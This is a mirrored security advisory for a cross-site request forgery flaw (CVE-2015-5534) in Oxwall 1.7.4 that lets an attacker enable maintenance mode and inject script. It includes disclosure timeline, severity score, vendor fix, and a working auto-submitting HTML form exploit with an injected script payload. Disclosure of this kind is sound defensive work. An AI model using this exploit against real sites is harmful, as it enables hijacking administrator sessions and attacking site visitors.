Lucene search
K

Oxwall 1.7.4 - CSRF Vulnerability

🗓️ 30 Oct 2015 00:00:00Reported by High-Tech BridgeType 
zdt
 zdt
🔗 0day.today👁 46 Views

Vulnerability in Oxwall 1.7.4 allows CSRF attacks, maintenance mode abuse, and XSS attack

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Oxwall Cross-Site Request Forgery Vulnerability
30 Oct 201500:00
cnvd
CVE
CVE-2015-5534
2 Nov 201519:00
cve
Cvelist
CVE-2015-5534
2 Nov 201519:00
cvelist
Exploit DB
Oxwall 1.7.4 - Cross-Site Request Forgery
30 Oct 201500:00
exploitdb
EUVD
EUVD-2015-5488
7 Oct 202500:30
euvd
exploitpack
Oxwall 1.7.4 - Cross-Site Request Forgery
30 Oct 201500:00
exploitpack
htbridge
Cross-Site Request Forgery on Oxwall
1 Jul 201500:00
htbridge
NVD
CVE-2015-5534
2 Nov 201519:59
nvd
Packet Storm
Oxwall 1.7.4 Cross Site Request Forgery
29 Oct 201500:00
packetstorm
Prion
Cross site request forgery (csrf)
2 Nov 201519:59
prion
Rows per page
Product: Oxwall
Vendor: http://www.oxwall.org
Vulnerable Version(s): 1.7.4 and probably prior
Tested Version: 1.7.4
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: September 8, 2015 
Public Disclosure: October 22, 2015 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-5534
Risk Level: High 
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in Oxwall, which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An attacker might be able to put the website under maintenance and perform XSS attacks against website visitors.
 
The vulnerability exists due to failure in the "/admin/pages/maintenance" script to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator to visit a page with CSRF exploit and put the entire website under maintenance. Additionally, the attacker is able to inject arbitrary HTML and JavaScript code into maintenance message and execute it in browsers of any website visitor. Successful exploitation of this vulnerability may allow an attacker to steal other users’ cookies, spread malware to website visitors, and even obtain full control over vulnerable website. 
 
A simple CSRF exploit below puts the website under maintenance and displays a JS popup with "ImmuniWeb" word to every website visitor:
 
 
<form action = "http://[host]/admin/pages/maintenance" method = "POST">
<input type="hidden" name="form_name" value="maintenance">
<input type="hidden" name="maintenance_enable" value="on">
<input type="hidden" name="save" value="Save">
<input type="hidden" name="maintenance_text" value="<script>alert('ImmuniWeb');</script>">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Oxwall 1.8

#  0day.today [2018-02-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation